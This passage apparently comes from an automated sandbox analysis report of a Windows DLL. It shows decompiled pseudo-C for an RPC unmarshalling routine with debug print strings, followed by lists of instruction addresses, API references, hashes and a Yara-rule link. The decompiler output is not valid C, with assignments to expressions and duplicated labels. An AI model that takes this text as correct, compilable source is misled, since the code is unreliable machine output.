										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L12:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [eax]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L13:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__edx + 4);
									_push(__eax);
									__ecx =  *__edx;
									_push(__ecx);
									0x6eda0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L14:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [eax]");
									asm("movsd [esp], xmm0");
									_push("double=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp - 4) & 0x0000ffff;
									__edx =  *(__ebp + 0xc);
									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__imp__RpcRaiseException();
									}
									L8:
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L15:
									 *(__ebp - 0x1c) = 0;
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									_push("pointer => %p\n");
									0x6eda0000();
									__esp = __esp + 8;
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__edx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(__ecx != 0x11) {
										 *(__ebp + 8) =  *(__ebp + 8) + 4;
										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
									}
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									 *(__ebp - 0x20) =  *(__eax + 4);
									__edx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__ecx =  *(__ebp + 0x14);
										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
										}
									} else {
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
										__eax =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x1c) = 1;
									}
									__ecx =  *(__ebp + 0x18) & 0x000000ff;
									__edx =  *(__ebp + 0x14);
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__ebp - 0x20);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
									if( *(__ebp - 0x1c) == 0) {
										L29:
										__edx =  *(__ebp + 0x10);
										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
											__edx =  *(__ebp + 0x10);
											__edx =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										} else {
											__ecx =  *(__ebp + 0x14);
											__ecx =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) = __ecx;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L47:
											 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L24:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6eda0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												__ecx =  *(__edx + 4);
												__ecx =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6eda0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x20);
										 *( *(__ebp + 8) + 4) = __ecx;
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
										goto L29;
									}
								case 8:
									L33:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L34:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									goto L0;
								case 0xb:
									L35:
									__ecx =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
									 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
									__ecx =  *(__ebp + 0x10);
									__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 0xc:
									L36:
									1 = 1 << 0;
									__eax =  *(__ebp + 0x10);
									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__eax =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__edx =  *(__ebp - 8);
									__eax =  *(__ebp + 8);
									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp - 0x18);
									_push( *(__ebp - 0x18));
									_push("embedded complex (size=%d) => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0x18) & 0x000000ff;
									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
										__ecx =  *(__ebp - 0x18);
										__edx =  *(__ebp + 0xc);
										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
									}
									__eax =  *(__ebp - 8);
									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
									__ecx =  *( *(__ebp - 8)) & 0x7f;
									__edx =  *(0x6edbb418 + __ecx * 4);
									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no unmarshaller for embedded type %02x\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__eax =  *(__ebp - 8);
										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									L45:
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 0xe:
									L10:
									__edx = __ebp - 0x24;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp - 0x24);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *__ecx;
									_push( *__ecx);
									_push("int3264=%ld => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 0xf:
									L11:
									__ecx = __ebp - 0x28;
									__edx =  *(__ebp + 8);
									E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
									__ecx =  *(__ebp - 0x28);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push(__ecx);
									_push("uint3264=%ld => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
										goto L1;
									}
								case 0x10:
									goto L46;
							}
						}
						return  *(_t214 + 0xc);
					}
				}
			}






                                                                                                0x6eda9990
                                                                                                0x6eda9990
                                                                                                0x6eda9990
                                                                                                0x6eda999a
                                                                                                0x6eda999f
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda956c
                                                                                                0x6eda9581
                                                                                                0x6eda958a
                                                                                                0x6eda9594
                                                                                                0x6eda9ab7
                                                                                                0x6eda9ac3
                                                                                                0x6eda9ac8
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda9acb
                                                                                                0x6eda959a
                                                                                                0x6eda959d
                                                                                                0x6eda95a4
                                                                                                0x00000000
                                                                                                0x6eda95ab
                                                                                                0x6eda95b5
                                                                                                0x6eda95c0
                                                                                                0x6eda95c7
                                                                                                0x6eda95c8
                                                                                                0x6eda95cd
                                                                                                0x6eda95d2
                                                                                                0x6eda95db
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95e3
                                                                                                0x6eda95e5
                                                                                                0x6eda95ed
                                                                                                0x6eda95f5
                                                                                                0x6eda95f8
                                                                                                0x6eda95f9
                                                                                                0x6eda95fc
                                                                                                0x6eda95ff
                                                                                                0x6eda9600
                                                                                                0x6eda9605
                                                                                                0x6eda960a
                                                                                                0x6eda960d
                                                                                                0x6eda9610
                                                                                                0x6eda9613
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9671
                                                                                                0x6eda9673
                                                                                                0x6eda967b
                                                                                                0x6eda9683
                                                                                                0x6eda9686
                                                                                                0x6eda9687
                                                                                                0x6eda968a
                                                                                                0x6eda968c
                                                                                                0x6eda968d
                                                                                                0x6eda9692
                                                                                                0x6eda9697
                                                                                                0x6eda969a
                                                                                                0x6eda969d
                                                                                                0x6eda96a0
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9726
                                                                                                0x6eda9728
                                                                                                0x6eda972c
                                                                                                0x6eda9730
                                                                                                0x6eda9738
                                                                                                0x6eda973b
                                                                                                0x6eda973c
                                                                                                0x6eda973f
                                                                                                0x6eda9743
                                                                                                0x6eda9746
                                                                                                0x6eda974b
                                                                                                0x6eda9750
                                                                                                0x6eda9755
                                                                                                0x6eda9758
                                                                                                0x6eda975b
                                                                                                0x6eda975e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9766
                                                                                                0x6eda9768
                                                                                                0x6eda9770
                                                                                                0x6eda9778
                                                                                                0x6eda977b
                                                                                                0x6eda977c
                                                                                                0x6eda977f
                                                                                                0x6eda9782
                                                                                                0x6eda9783
                                                                                                0x6eda9785
                                                                                                0x6eda9786
                                                                                                0x6eda978b
                                                                                                0x6eda978e
                                                                                                0x6eda978f
                                                                                                0x6eda9794
                                                                                                0x6eda9799
                                                                                                0x6eda979f
                                                                                                0x6eda97a2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97aa
                                                                                                0x6eda97ac
                                                                                                0x6eda97b0
                                                                                                0x6eda97b4
                                                                                                0x6eda97bc
                                                                                                0x6eda97bf
                                                                                                0x6eda97c0
                                                                                                0x6eda97c3
                                                                                                0x6eda97c6
                                                                                                0x6eda97ca
                                                                                                0x6eda97cf
                                                                                                0x6eda97d4
                                                                                                0x6eda97d9
                                                                                                0x6eda97dc
                                                                                                0x6eda97df
                                                                                                0x6eda97e2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda961b
                                                                                                0x6eda961d
                                                                                                0x6eda9625
                                                                                                0x6eda962d
                                                                                                0x6eda9631
                                                                                                0x6eda9634
                                                                                                0x6eda9636
                                                                                                0x6eda9639
                                                                                                0x6eda963a
                                                                                                0x6eda963d
                                                                                                0x6eda963f
                                                                                                0x6eda9640
                                                                                                0x6eda9645
                                                                                                0x6eda964a
                                                                                                0x6eda964d
                                                                                                0x6eda9656
                                                                                                0x6eda9658
                                                                                                0x6eda965d
                                                                                                0x6eda965d
                                                                                                0x6eda9663
                                                                                                0x6eda9663
                                                                                                0x6eda9666
                                                                                                0x6eda9669
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97ea
                                                                                                0x6eda97ea
                                                                                                0x6eda97f1
                                                                                                0x6eda97f4
                                                                                                0x6eda97f5
                                                                                                0x6eda97fa
                                                                                                0x6eda97ff
                                                                                                0x6eda9802
                                                                                                0x6eda9805
                                                                                                0x6eda980b
                                                                                                0x6eda980d
                                                                                                0x6eda9810
                                                                                                0x6eda9810
                                                                                                0x6eda9813
                                                                                                0x6eda9816
                                                                                                0x6eda981c
                                                                                                0x6eda9823
                                                                                                0x6eda9827
                                                                                                0x6eda982c
                                                                                                0x6eda982f
                                                                                                0x6eda9832
                                                                                                0x6eda9835
                                                                                                0x6eda9838
                                                                                                0x6eda983f
                                                                                                0x6eda9860
                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994b
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f0
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96e7
                                                                                                0x6eda96e9
                                                                                                0x6eda96ed
                                                                                                0x6eda96f9
                                                                                                0x6eda96fc
                                                                                                0x6eda96ff
                                                                                                0x6eda9701
                                                                                                0x6eda9704
                                                                                                0x6eda9705
                                                                                                0x6eda9708
                                                                                                0x6eda970a
                                                                                                0x6eda970b
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971b
                                                                                                0x6eda971e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf
                                                                                                0x6eda9acb

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDA7480: _memset.LIBCMT ref: 6EDA74A6
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA965D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memset
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                                • API String ID: 154592334-1168472477
                                                                                                • Opcode ID: a5e56316ec218451630bb4bc94734564d8bd6e59b71ffcea0955cad929fc440d
                                                                                                • Instruction ID: 4d2a72a32aeae316f0c7037ab017f599829aaa8fba4a126bfa3ef6a621d44a75
                                                                                                • Opcode Fuzzy Hash: a5e56316ec218451630bb4bc94734564d8bd6e59b71ffcea0955cad929fc440d
                                                                                                • Instruction Fuzzy Hash: A7C13BB5A00109AFCB04CF99E890EEA77B9AF89314F04C519FA594F345E731EA51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA9AB5, Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 24%
                                                                                                			E6EDA9AB5() {
				void* _t210;
				void* _t212;

				L0:
				while(1) {
					L0:
					while(1) {
